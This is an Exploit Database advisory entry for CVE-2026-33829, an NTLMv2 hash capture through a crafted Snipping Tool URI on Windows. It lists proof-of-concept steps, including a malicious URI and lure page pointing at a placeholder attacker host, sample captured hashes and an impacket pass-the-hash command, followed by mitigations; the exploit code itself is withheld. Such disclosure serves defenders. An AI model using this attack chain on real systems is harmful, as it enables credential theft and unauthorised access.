This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Windows Snipping Tool - NTLMv2 Hash Hijack EDB-ID: 52567 CVE: 2026-33829 EDB Verified: Author: NU11SECUR1TY Type: LOCAL Exploit: / Platform: WINDOWS Date: 2026-05-15 Vulnerable App: # Exploit Title: Windows Snipping Tool - NTLMv2 Hash Hijack # Date: 2026-04-22 # Exploit Author: nu11secur1ty # Video Demo: https://www.patreon.com/posts/cve-2026-33829-156243398 # Vendor Homepage: https://www.microsoft.com # Software Link: Built-in Windows Snipping Tool # Version: Windows 10, Windows 11, Windows Server 2012-2025 (pre-April 2026 patch) # Tested on: Windows 11 Pro (Build 22621) / Kali Linux 2026.1 # CVE: CVE-2026-33829 # Attack Type: Remote / Network-based # Impact: Credential Theft (NTLMv2 Hash) / Pass-the-Hash # CVSS Score: 4.3 (Medium) but HIGH impact in practice ## Vulnerable Systems - Windows 10 (all versions before April 14, 2026 patch) - Windows 11 (all versions before April 14, 2026 patch) - Windows Server 2012, 2016, 2019, 2022, 2025 (before April 14, 2026 patch) ## Description A vulnerability in Windows Snipping Tool (CVE-2026-33829) allows attackers to force NTLMv2 authentication to a remote SMB server via crafted ms-screensketch:edit URI. When a victim clicks a malicious link and approves the "Open Snipping Tool" prompt, Windows automatically sends the user's NTLMv2 hash to the attacker-controlled server. This exploit extends beyond the original PoC by also harvesting HTTP NTLM hashes (via WPAD), LLMNR, and MDNS poisoning - capturing MULTIPLE valid hashes from a SINGLE click. Captured hashes can be used for Pass-the-Hash attacks or cracked with Hashcat. ## Exploit Features (nu11secur1ty edition) - ✅ Snipping Tool NTLM hash capture (original vector) - ✅ Automatic HTTP NTLM authentication capture (additional vector) - ✅ WPAD poisoning (automatic proxy config) - ✅ LLMNR/MDNS poisoning (fallback vectors) - ✅ Multi-harvest - captures multiple hashes from one click - ✅ One-command execution (sudo python3 exploit.py) - ✅ Auto-detects terminal and opens Responder in new window - ✅ Built-in HTTP server for HTML delivery ## Proof of Concept **Video Demonstration (Patreon Exclusive):** https://www.patreon.com/posts/cve-2026-33829-156243398 1. Run exploit on attacker machine (Kali Linux): sudo python3 CVE-2026-33829-NTLMv2-Hash-Hijack.py 2. Victim (Windows 11) opens the malicious URL: http://<ATTACKER_IP>/exploit.html 3. Victim clicks the button and approves "Open Snipping Tool" 4. Attacker captures NTLMv2 hash(es): [HTTP] NTLMv2 Username : \Hacked [HTTP] NTLMv2 Hash : Hacked:::157e1f851f7c17e7:16D87BC0AD284FB6... 5. Attacker performs Pass-the-Hash to gain access: impacket-psexec -hashes :<HASH> Hacked@<VICTIM_IP> ## Attack Vector ms-screensketch:edit?filePath=\\<ATTACKER_IP>\test\evil.png ## Requirements Attacker: Kali Linux (or any Linux with Python3, impacket, responder) Victim: Windows 10/11 with Snipping Tool (unpatched) ## Mitigations - Apply Microsoft patch from April 14, 2026 - Block outbound SMB traffic (port 445) - Disable NTLMv1 and restrict NTLMv2 via GPO - Educate users not to click "Open Snipping Tool" prompts from untrusted sources ## References - https://cybersecuritynews.com/windows-snipping-tool-vulnerability/ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829 - https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2026-33829 ## Exploit Code (NFO) The exploit will not be published for security reasons! For more information, please get in touch with me! -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.